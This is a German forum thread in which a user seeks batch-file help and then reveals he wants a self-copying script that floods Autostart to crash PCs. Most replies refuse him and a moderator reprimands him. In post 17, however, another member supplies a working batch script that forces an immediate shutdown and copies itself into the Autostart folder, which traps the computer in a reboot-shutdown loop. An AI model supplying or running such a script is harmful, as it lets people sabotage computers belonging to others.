Mit Batch eine Batch erstellen?

Dieses Thema im Forum "Programmieren" wurde erstellt von SmileyKP, 14. April 2006.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Hi,

    ich möchte eine Batch schreiben. ("Ach ne. Wirklich?" :aua: )
    Diese Batch soll eine Batch mit z.B. dem Inhalt:
    ECHO.
    ECHO lol
    ECHO.

    in einem anderen Ordner erstellen.

    Jetzt habe ich das Problem das ich nicht weiß wie das gehen soll. Ich habe das versucht so zu lösen:

    ECHO "ECHO.
    ECHO lol
    ECHO.
    ">>C:\\lol\lol.bat

    Aber das ist Falsch. Wie kann ich das sonst machen? Gibt es ein Zeichen für einen Absatz?
    Danke für eure Hilfe :bet:
     
  2. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    wie wärs mit

    @echo off
    echo @echo off > C:\lol\lol.bat
    echo ECHO. >> C:\lol\lol.bat
    echo ECHO lol >> C:\lol\lol.bat
    echo ECHO. >> C:\lol\lol.bat
     
  3. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Danke das teste ich gleich mal ^^

    EDIT:
    Nein das geht nicht. Die erstellte Datei soll dann auch eine Datei erstellen. Wie mach ich das dann?
    Also so:
    Code:
    @ECHO off
    ECHO @echo off > C:\lol\lol.bat
    ECHO ECHO. >> C:\lol\lol.bat
    ECHO [B]ECHO >lol.dat[/B] >> C:\lol\lol.bat
    ECHO ECHO. >> C:\lol\lol.bat
    Dann steht in der erstellten Datei nur:
    Code:
    @echo off
    ECHO.
    ECHO
    ECHO.
    Wie löse ich das Problem?
     
  4. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    ganz einfach: mit echo garnicht.

    das '>' ist genauso wie das '|' ein spezialzeichen unter dos (und allen interpretern die so tun als wären sie ein dosprompt) und kann nicht ge'echo't werden.
     
  5. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Das habe ich auch schon bemerkt... -.-

    Und wie mache ich das jetzt? ^^
     
  6. JojoKoester

    JojoKoester Halbes Megabyte

    Registriert seit:
    13. Dezember 2003
    Beiträge:
    547
    Warum nehmt ihr eigentlich alle Batch-Dateien? Ist QBasic nicht viel einfacher? Es ist kostenlos und der Syntax ist schon fast (meiner Meinung nach) als der einer Batch-Datei.
     
  7. michag

    michag Kbyte

    Registriert seit:
    30. September 2002
    Beiträge:
    299
    ähm.. verstehe nur Bahnhof.

    Aber ich habe sowas unter DOS immer mit Hilfe einer zweiten Datei gemacht.
    Also eine .BAT und eine .TXT zum Beispiel. (Kann auch ohne Endung nur datas heissen oder wie auch immer)
    Und die .TXT kann man bequem mit TYPE ausgeben...
    oder mit COPY von .TXT nach .BAT kopieren usw. usf.
    Das Verarbeitungsfeld ist vielseitig.

    Wenn Du aus bestimmten Gründen nur mit einer einzelnen File arbeiten kannst, könnte man trotzdem sowas basteln denke ich.

    Ich bräuchte etwas mehr Info um besser helfen zu können.

    mg
     
  8. mb76

    mb76 Byte

    Registriert seit:
    22. März 2006
    Beiträge:
    100
    Hallo,

    grundsätzlich ist das möglich, aber bevor man das WIE beantworten kann, müßte man wissen WARUM? Was willst du eigentlich mit dieser Funktion erreichen (außer z.B. die Festplatte restlos füllen)???

    Ich kann dir helfen, aber konkretisiere dein Vorhaben erst einmal.

    Gruß

    mb76
     
  9. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Eigentlich hast du schon gesagt was ich machen will ...
    Aber hier nochmal: Mir is langweilig und ich möchte mein Batch wissen erweitern, indem ich ein kleines Batch Programm bastle. Nix schlimmes. Sie soll sich beim Starten in den Ordner Autostart kopieren oder einen Registry Schlüssel erstellen. (Kein Plan wie) Dann beim starten dieser Datei soll sie den Autostart mit Dateien vollballern, die dann beim nächsten Start alle mitstarten und hoffentlich den PC ab*****n lassen. Also nix schlimmes.
    Und ich möchte das nur mit einer "Source" Datei machen. ^^

    Danke für eure Hilfe.

    PS: Ich habe nicht vor den irgendwem zu schicken. Außer jemand WILL es so. (Kenne einen der is so ********, der würde sogar zustimmen wenn man sage, man will seinen PC aus dem Fenster werfen. Klingt komisch, ist aber so. ^^)
     
  10. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    :dumm: oh mann, ein kleinkind...

    für eine zünftige forkbomb reichen 3 batchzeilen und keine einzige davon enthält echo ;)
     
  11. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Wirklich??? Glaub ich nicht...


    ... scherz beiseite. Hast du überhaupt meine Threads gelesen? Oder wurden die dir vorgelesen? Wenn ja dann hat man dir aber einiges verschwiegen ... Les' nochmal genau. Nur eine Datei als Source... soll ich s dir vielleicht buchstabieren?
     
  12. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    lehne dankend ab. verstanden hab` ich dich und buchstabieren kann ich selber


    nur helfen werde ich dir nicht dabei.

    zu einfach :P
     
  13. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Hast mich wirklich verstanden? Ich weiß was ich eintippen muss, um die Festplatte vollzuballern. -.- Ich will nur wissen wie ich es anstelle, dass eine Datei eine Datei erstellt, die beim sysstart dateien erstellt ... was ja nicht mit ECHO zu gehen scheint. Und wenn du es gelesen hast, dann müsstest du auch das gelesen haben: Mir is langweilig und ich möchte mein Batch wissen erweitern, indem ich ein kleines Batch Programm bastle.
    Ich möchte einfach nur wissen mit welchem Befehl ich es anstelle ...
    Ist das zu viel verlangt? -.-
     
  14. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
    Nein, aber du kannst auch nicht verlangen dass dir hier alles auf dem Silbertablett präsentiert wird, vor allem nicht wenn es sich dabei um Code handelt mit dem man Viren schreiben kann.

    Und wenn du dann noch so abfällig antwortest wie in Beitag #11 dann darf es dich nicht wundern dass dir keiner mehr helfen will.

    Lesestoff:
    http://download.knowware.de/batch.pdf
     
  15. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Mit Post 11 habe ich darauf geantwortet:
    Und danke ich werd gleich mal reinschauen... :bet:
     
  16. SmileyKP

    SmileyKP Byte

    Registriert seit:
    10. April 2006
    Beiträge:
    38
    Ich hab mir das mal angeguckt. Das steht nichts nützliches drin. Vielleicht weil dieses PDF von einem PoFo (wohl ein mini PC/PDA) handelt, und dort sei wohl alles anders, laut dem PDF.
    Weiß sonst noch einer irgendetwas?

    PS: Eine ForkBomb, wie Michi0815 schrieb, will ich nicht. Ich möchte nur wissen wie man es hinbekommt, dass eine Batch eine Batch-erstellende Batch schreibt. ^^
     
  17. rayen9

    rayen9 ROM

    Registriert seit:
    17. Juni 2007
    Beiträge:
    2
    ACHTUNG!! Damit kannste deinen PC sehr leicht kaputt machen:comprob: :bremse: :fire: !!
    Gib einfach mal folgendes in den Editor ein und speicher es unter *.bat


    @echo off
    shutdown -s -f -t 0 -c
    copy %0 "%userprofile%/startm~1/Programme/Autostart/
     
  18. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
    @ rayen9

    Dein Beitrag kommt zu spät. Und das Thema hast du auch verfehlt.

    :zu:
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen